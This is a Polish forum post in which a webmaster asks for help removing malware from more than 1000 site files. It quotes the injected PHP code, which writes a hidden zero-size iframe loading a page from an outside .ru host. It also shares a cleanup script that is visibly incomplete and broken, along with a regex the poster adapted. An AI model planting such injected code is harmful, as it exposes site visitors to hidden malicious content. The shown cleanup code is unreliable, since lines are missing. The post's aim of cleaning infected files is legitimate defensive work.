Posiadam zainfekowane ponad 1000 plików wirusem:
<? #8c2699# echo " <script type=\"text/javascript\" language=\"javascript\" > document.write('<iframe src=\"http://jaqvicmy.ru/count7.php\" border=\"0\" width=\"0\" height=\"0\" style=\"display:none\"></iframe>');</script>"; #/8c2699# ?>
Znalazłem skrypt php który automatycznie powinien mi usunąć niechciany kod z plików:
<?php $kasuj = 1; #jezeli chcesz tylko informacje o zakazonych plikach, bez usuwania iframe ustaw na 0 $folder = '.'; #wpisz tutaj nazwe przeszukiwanego folderu, kropka onacza wszystkie foldery function ListFiles($dir) { if($file != "." && $file != ".." && $file[0] != '.') { $inner_files = ListFiles($dir . "/" . $file); } else { if($type == '.php' OR $type == '.html' OR $type == '.tpl') } } } return $files; } } $pattern="/<iframe src=\".*\" width=1 height=1.*\"><\/iframe>/"; foreach (ListFiles($folder) as $key=>$file){ echo "<span style=\"font-family:arial;font-size:14px;font-color:black;display:block;margin-left:5px;margin-top:20px;\">Sprawdzam plik <b>".$file ."</b></span>"; if($count != '0') { if($kasuj == 1) if(@file_put_contents($file, $ncontents)) echo "<span style=\"font-family:arial;font-size:14px;font-color:#800000;display:block;margin-left:50px;font-weight:bold;\">Znaleziono i <font color=\"red\">pomyslnie skasowano</font> <b>iframe</b> z pliku <u>".$file."</u></span>"; else echo "<span style=\"font-family:arial;font-size:14px;font-color:#800000;display:block;margin-left:50px;font-weight:bold;\">Znaleziono <font color=\"red\">lecz nie udało się usunac</font> <b>iframe</b> z pliku <u>".$file."</u></span>"; } else echo "<span style=\"font-family:arial;font-size:14px;font-color:black;display:block;margin-left:50px;\">Plik <b>".$file."</b> nie jest zainfekowany</span>"; } ?>
No i przerobiłem sobie pod swój wirus skrypt:
$pattern="/#8c2699#(.*)#\/8c2699#/";
I nie usuwa ciągu znaków :/ w wirusie mam spacje i entery to może dlatego (.*) -> nie działa?